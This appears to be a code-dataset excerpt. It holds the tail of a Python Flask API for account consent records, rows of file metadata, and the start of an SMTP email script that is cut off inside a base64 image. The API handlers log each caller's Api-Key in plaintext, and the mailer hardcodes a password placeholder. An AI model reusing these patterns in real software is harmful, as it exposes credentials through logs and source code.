logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
cr_id = str(cr_id)
except Exception as exp:
error_title = "Unsupported cr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("cr_id: " + cr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ServiceLinkStatusRecord
try:
logger.info("Fetching ConsentRecord")
db_entries = get_cr(account_id=account_id, slr_id=slr_id, cr_id=cr_id)
except StandardError as exp:
error_title = "ConsentRecord not accessible"
logger.error(error_title + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentRecord found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentStatusRecords(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id, cr_id):
logger.info("AccountConsentStatusRecords")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, cr_id=cr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
cr_id = str(cr_id)
except Exception as exp:
error_title = "Unsupported cr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("cr_id: " + cr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentStatusRecords
try:
logger.info("Fetching ConsentStatusRecords")
db_entries = get_csrs(account_id=account_id, slr_id=slr_id, cr_id=cr_id)
except StandardError as exp:
error_title = "ConsentStatusRecords not accessible"
logger.error(error_title + ": " + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentStatusRecords found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentStatusRecords Fetched")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountConsentStatusRecord(Resource):
@requires_api_auth_user
def get(self, account_id, slr_id, cr_id, csr_id):
logger.info("AccountConsentStatusRecord")
try:
endpoint = str(api.url_for(self, account_id=account_id, slr_id=slr_id, cr_id=cr_id, csr_id=csr_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
slr_id = str(slr_id)
except Exception as exp:
error_title = "Unsupported slr_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("slr_id: " + slr_id)
try:
cr_id = str(cr_id)
except Exception as exp:
error_title = "Unsupported cr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("cr_id: " + cr_id)
try:
csr_id = str(csr_id)
except Exception as exp:
error_title = "Unsupported csr_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("csr_id: " + csr_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get ConsentStatusRecord
try:
logger.info("Fetching ConsentStatusRecord")
db_entries = get_csr(account_id=account_id, slr_id=slr_id, cr_id=cr_id, csr_id=csr_id)
except StandardError as exp:
error_title = "ConsentStatusRecord not accessible"
logger.error(error_title + repr(exp))
raise ApiError(code=403, title=error_title, detail=repr(exp), source=endpoint)
except Exception as exp:
error_title = "No ConsentStatusRecord found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("ConsentStatusRecord Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
# Register resources
api.add_resource(Accounts, '/api/accounts/', '/', endpoint='/api/accounts/')
api.add_resource(AccountExport, '/api/accounts/<string:account_id>/export/', endpoint='account-export')
api.add_resource(AccountParticulars, '/api/accounts/<string:account_id>/particulars/', endpoint='account-particulars')
api.add_resource(AccountParticular, '/api/accounts/<string:account_id>/particulars/<string:particulars_id>/', endpoint='account-particular')
api.add_resource(AccountContacts, '/api/accounts/<string:account_id>/contacts/', endpoint='account-contacts')
api.add_resource(AccountContact, '/api/accounts/<string:account_id>/contacts/<string:contacts_id>/', endpoint='account-contact')
api.add_resource(AccountEmails, '/api/accounts/<string:account_id>/emails/', endpoint='account-emails')
api.add_resource(AccountEmail, '/api/accounts/<string:account_id>/emails/<string:emails_id>/', endpoint='account-email')
api.add_resource(AccountTelephones, '/api/accounts/<string:account_id>/telephones/', endpoint='account-telephones')
api.add_resource(AccountTelephone, '/api/accounts/<string:account_id>/telephones/<string:telephones_id>/', endpoint='account-telephone')
api.add_resource(AccountSettings, '/api/accounts/<string:account_id>/settings/', endpoint='account-settings')
api.add_resource(AccountSetting, '/api/accounts/<string:account_id>/settings/<string:settings_id>/', endpoint='account-setting')
api.add_resource(AccountEventLogs, '/api/accounts/<string:account_id>/logs/events/', endpoint='account-events')
api.add_resource(AccountEventLog, '/api/accounts/<string:account_id>/logs/events/<string:event_log_id>/', endpoint='account-event')
api.add_resource(AccountServiceLinkRecords, '/api/accounts/<string:account_id>/servicelinks/', endpoint='account-slrs')
api.add_resource(AccountServiceLinkRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/', endpoint='account-slr')
api.add_resource(AccountServiceLinkStatusRecords, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/statuses/', endpoint='account-slsrs')
api.add_resource(AccountServiceLinkStatusRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/statuses/<string:slsr_id>/', endpoint='account-slsr')
api.add_resource(AccountConsentRecords, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/', endpoint='account-crs')
api.add_resource(AccountConsentRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/<string:cr_id>/', endpoint='account-cr')
api.add_resource(AccountConsentStatusRecords, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/<string:cr_id>/statuses/', endpoint='account-csrs')
api.add_resource(AccountConsentStatusRecord, '/api/accounts/<string:account_id>/servicelinks/<string:slr_id>/consents/<string:cr_id>/statuses/<string:csr_id>/', endpoint='account-csr')
| 41.032768
| 184
| 0.619181
| 12,339
| 106,439
| 5.143367
| 0.024313
| 0.083008
| 0.051699
| 0.060822
| 0.877631
| 0.874228
| 0.867405
| 0.862599
| 0.850955
| 0.848922
| 0
| 0.008175
| 0.286342
| 106,439
| 2,593
| 185
| 41.048592
| 0.827306
| 0.04986
| 0
| 0.847711
| 0
| 0.001928
| 0.15711
| 0.017192
| 0
| 0
| 0
| 0.000386
| 0
| 1
| 0.01494
| false
| 0.001446
| 0.008193
| 0
| 0.063133
| 0.000964
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91e1a32174e4a9edbde9d069cccca2f30ff0366e
| 20,131
|
py
|
Python
|
Server/tools/email/sendEmail.py
|
Jijun/Alert-Platform
|
0708cc5a17d06d0a8401a0450426bf4f6aba0bfb
|
[
"MIT"
] | null | null | null |
Server/tools/email/sendEmail.py
|
Jijun/Alert-Platform
|
0708cc5a17d06d0a8401a0450426bf4f6aba0bfb
|
[
"MIT"
] | null | null | null |
Server/tools/email/sendEmail.py
|
Jijun/Alert-Platform
|
0708cc5a17d06d0a8401a0450426bf4f6aba0bfb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#@author: PI
import sys
import base64
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email import encoders
import idna
def base64_decode(param):
param = bytes(param, encoding="utf-8");
param = base64.b64decode(param).decode("utf-8")
return param;
def punycode_converter(param):
param = param.split("@")
return idna.encode(param[0]).decode("utf-8") + "@" + idna.encode(param[1]).decode("utf-8")
def send_email(to, subject, body):
# THIS FUNCTION SUPPORTS SMTPUTF8 (receiver's email address contains UTF-8 characters); you need a SMTP server which supports SMTPUTF8 to enable this feature, however.
user = "example@example.com"
email_password = "blahblah"
smtp_server = "SMTP.locahost"
smtp_port = 587
msg = MIMEMultipart()
msg['From'] = user
msg['Subject'] = base64_decode(subject)
default_body_head = '<div style="width:78.7%;margin:auto;font-size:14px;font-family:Times New Roman,Times,STFangsong,Microsoft YaHei,黑体,宋体"><div style="padding:28px 12px;display:block;height:auto;text-align:justify;background:#f9f5a9;color:#1082a5;width:100%;border:3px solid #898989;-webkit-border-radius:22px;-moz-border-radius:22px;border-radius:22px;-webkit-box-shadow:0 0 20px rgba(0,0,0,.32);-moz-box-shadow:0 0 20px rgba(0,0,0,.32);box-shadow:0 0 20px rgba(0,0,0,.32)"><!--This system is designed by Mike in Beiing. Copyright 2019 Mike. All rights reserved.--><a href="https://github.com/Pi-314159265" target="_blank"><img src="data:image/png;base64,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